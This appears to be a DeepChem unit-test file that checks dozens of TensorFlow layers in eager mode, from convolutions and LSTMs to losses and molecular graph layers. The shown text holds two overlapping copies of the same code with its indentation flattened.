"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphEmbedPoolLayer(num_vertices=6)
result2 = layer2(V, adjs)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_graph_cnn(self):
"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
| import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
